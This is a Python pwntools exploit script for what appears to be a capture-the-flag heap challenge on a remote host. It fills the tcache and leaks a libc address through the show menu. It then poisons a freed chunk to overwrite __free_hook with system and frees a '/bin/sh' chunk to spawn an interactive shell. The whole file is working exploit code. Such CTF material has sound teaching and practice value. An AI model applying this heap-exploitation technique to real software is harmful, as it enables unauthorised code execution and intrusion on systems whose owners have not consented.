import ctypes
import itertools

from pwn import *
# Target configuration: pwntools context, remote endpoint, and the challenge binary.
context.update(os='linux', arch='amd64', log_level='debug')

# 0 makes connect() use the remote endpoint; a truthy value makes it start a local process() instead.
is_debug = 0
IP = "hnctf.imxbt.cn"
PORT = 40950

# Load the challenge binary once; context.binary holds the same ELF object.
elf = ELF('./what')
context.binary = elf
libc = elf.libc
def connect():
    """Open the tube the rest of the script talks to.

    Returns a remote() tube to IP:PORT, or a local process() when the
    module-level ``is_debug`` flag is truthy.
    """
    if is_debug:
        return process()
    return remote(IP, PORT)
# Thin I/O wrappers around the global tube ``p``. Each one looks ``p`` up at
# call time, so they are only usable after ``p = connect()`` has run.
def g(x):
    """Attach gdb to ``x``."""
    return gdb.attach(x)


def s(x):
    """Send ``x`` with no trailing newline."""
    return p.send(x)


def sl(x):
    """Send ``x`` followed by a newline."""
    return p.sendline(x)


def sa(x, y):
    """Wait until ``x`` appears in the output, then send ``y``."""
    return p.sendafter(x, y)


def sla(x, y):
    """Wait until ``x`` appears in the output, then send ``y`` plus a newline."""
    return p.sendlineafter(x, y)


def r(x=None):
    """Receive up to ``x`` bytes, or call ``p.recv()`` with its default size when ``x`` is None."""
    if x is None:
        return p.recv()
    return p.recv(x)


def rl():
    """Receive one line."""
    return p.recvline()


def ru(x):
    """Receive until ``x`` has been seen."""
    return p.recvuntil(x)


def r_leak_libc_64():
    """Read through the next 0x7f byte; zero-pad its last 6 bytes to 8 and unpack as u64."""
    tail = p.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))


def r_leak_libc_32():
    """Read through the next 0xf7 byte and unpack its last 4 bytes as u32."""
    tail = p.recvuntil(b'\xf7')[-4:]
    return u32(tail)
def add(size):
    """Select menu command 1 and answer the size prompt with ``size``."""
    steps = (
        ("Enter your command:", "1"),
        ("size:", str(size)),
    )
    for prompt, answer in steps:
        sla(prompt, answer)
def delete():
    """Select menu command 2; nothing further is sent for this command."""
    command = "2"
    sla("Enter your command:", command)
def show(idx):
    """Select menu command 3 and answer the index prompt with ``idx``."""
    steps = (
        ("Enter your command:", "3"),
        ("please enter idx:", str(idx)),
    )
    for prompt, answer in steps:
        sla(prompt, answer)
def edit(idx, content):
    """Select menu command 4, answer the index prompt with ``idx``, then send ``content``.

    ``content`` is sent raw (sendafter, no newline appended) once the
    content prompt has been seen.
    """
    command = "4"
    sla("Enter your command:", command)
    sla("please enter idx:", str(idx))
    sa("Please enter your content:", content)
# Interaction sequence. Every step waits on the prompt produced by the
# previous one, so the order of these calls is fixed.
p = connect()

# Nine allocations of 0x80, eight deletes, then show index 1.
for _ in range(9):
    add(0x80)
for _ in range(8):
    delete()
show(1)

# Take the 6 bytes printed after "Content:" and unpack them as a zero-padded u64.
ru("Content:")
leak = u64(r(6).ljust(8, b'\x00'))
success(hex(leak))

# NOTE(review): presumably the distance between a leaked pointer and the libc
# base captured in one run; it only holds for the libc build this target uses — confirm.
leaked_ptr_offset = 0x72b6087ebca0 - 0x72b608400000
libc_base = leak - leaked_ptr_offset
success(hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']

# Write free_hook into slot 3, allocate three more 0x80 chunks, then write
# system into slot 3 and the "/bin/sh" string into slot 2 before the last delete().
edit(3, p64(free_hook))
for _ in range(3):
    add(0x80)
edit(3, p64(system))
edit(2, b'/bin/sh\x00\x00')
delete()

p.interactive()